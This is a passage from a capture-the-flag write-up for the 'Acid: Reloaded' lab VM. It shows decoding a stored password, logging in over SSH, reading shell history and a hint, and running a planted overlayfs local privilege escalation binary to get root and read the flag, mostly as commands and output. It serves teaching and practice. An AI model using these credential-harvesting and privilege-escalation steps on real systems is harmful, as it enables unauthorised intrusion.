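    if len(payload) != length:
        raise ValueError(f"declared length {length} exceeds data ({len(raw) - 8} bytes)")
    text = payload.decode("utf-16-le").rstrip("\x00")
    return {"tag": tag, "length": length, "text": text, "raw_len": len(raw)}


if __name__ == "__main__":
    raw = base64.b64decode(EXTENDED_B64)
    print(hexdump(raw))
    print(decode_extended(EXTENDED_B64))
    # {'tag': 1, 'length': 18, 'text': 'NooB@123', 'raw_len': 26}
```

Reading through a hex dump before guessing at "unprintable characters" is a habit worth keeping: here it also shows that the value was stored as UTF-16, which is why a byte-oriented `base64 -d` looked odd in the first place.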

Port 22 is open, so I tried to use the above information to login via SSH. After several attempts, I found the lowercase version of “Makke” is the username:

root@kali:~# ssh makke@192.168.159.145

    _    ____ ___ ____        ____  _____ _     ___    _    ____  _____ ____  
   / \  / ___|_ _|  _ \      |  _ \| ____| |   / _ \  / \  |  _ \| ____|  _ \ 
  / _ \| |    | || | | |_____| |_) |  _| | |  | | | |/ _ \ | | | |  _| | | | |
 / ___ \ |___ | || |_| |_____|  _ <| |___| |__| |_| / ___ \| |_| | |___| |_| |
/_/   \_\____|___|____/      |_| \_\_____|_____\___/_/   \_\____/|_____|____/ 

									-by Acid

Wanna Knock me out ??? 
3.2.1 Let's Start the Game.
                                                                              
makke@192.168.159.145's password: 
Welcome to Ubuntu 15.04 (GNU/Linux 3.19.0-15-generic i686)

 * Documentation:  https://help.ubuntu.com/

168 packages can be updated.
91 updates are security updates.

Last login: Mon Aug 24 21:25:34 2015 from 192.168.88.236

Got a user shell now! Time to look around and try to privesc.

makke@acid:~$ pwd
/home/makke
makke@acid:~$ ls -al
total 32
drwxr-xr-x 3 makke makke 4096 Aug 24 21:28 .
drwxr-xr-x 4 root  root  4096 Aug 24 19:11 ..
-rw------- 1 makke makke  205 Aug 24 21:31 .bash_history
-rw-r--r-- 1 makke makke  220 Aug 24 19:11 .bash_logout
-rw-r--r-- 1 makke makke 3760 Aug 24 19:11 .bashrc
drwx------ 2 makke makke 4096 Aug 24 21:25 .cache
-rw-rw-r-- 1 makke makke   40 Aug 24 21:28 .hint
-rw-r--r-- 1 makke makke  675 Aug 24 19:11 .profile
makke@acid:~$ cat .bash_history
exit
cd ..
clear
cd /
ls
cd bin/
clear
./overlayfs 
clear
cd /home/makke/
clear
nano .hint
clear
ls
clear
ls
ls -a
cat .hint 
clear
cd /bin/
ls
./overlayfs 
clear
wgt
wget
apt-get remove wget
su
su -
exit

makke@acid:~$ cat .hint
Run the executable to own kingdom :-)

OK, two things spring to mind here. The first is that “overlayfs” may refer to the Ubuntu overlayfs exploit that I have seen a few times before – worth a try. The second is that running /bin/overlayfs may provide some more info – maybe leading to a buffer overflow that I’ll have to exploit.

makke@acid:~$ lsb_release -a
No LSB modules are available.
Distributor ID:	Ubuntu
Description:	Ubuntu 15.04
Release:	15.04
Codename:	vivid

OK, so the overlayfs exploit may work. I’ll try that later if /bin/overlayfs proves to be useless.

makke@acid:~$ /bin/overlayfs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
root

Bingo! Well, that was a lot simpler than I had thought…

# cd /root/
# ls -al
total 68
drwx------  5 root root  4096 Aug 24 21:32 .
drwxr-xr-x 22 root root  4096 Aug 24 20:58 ..
-rw-------  1 root root 23934 Aug 24 22:25 .bash_history
-rw-r--r--  1 root root  3135 Aug  8 18:02 .bashrc
drwx------  2 root root  4096 Aug 24 17:46 .cache
drwx------  3 root root  4096 Aug  6 17:55 .config
drwx------  3 root root  4096 Aug  6 15:51 .dbus
-rw-r--r--  1 root root   284 Aug 24 20:57 .flag.txt
-rw-------  1 root root  2775 Aug 24 21:32 .mysql_history
-rw-------  1 root root   147 Aug 24 23:32 .nano_history
-rw-r--r--  1 root root   140 Feb 20  2014 .profile
-rw-r--r--  1 root root    66 Aug  6 17:31 .selected_editor

# cat .flag.txt
Dear Hax0r,

You have completed the Challenge Successfully.

Your Flag is : "Black@Current@Ice-Cream"

Kind & Best Regards

-ACiD

Twitter:https://twitter.com/m_avinash143
Facebook: https://www.facebook.com/M.avinash143
LinkedIN: https://in.linkedin.com/pub/avinash-thapa/101/406/4b5

by Robert Winkel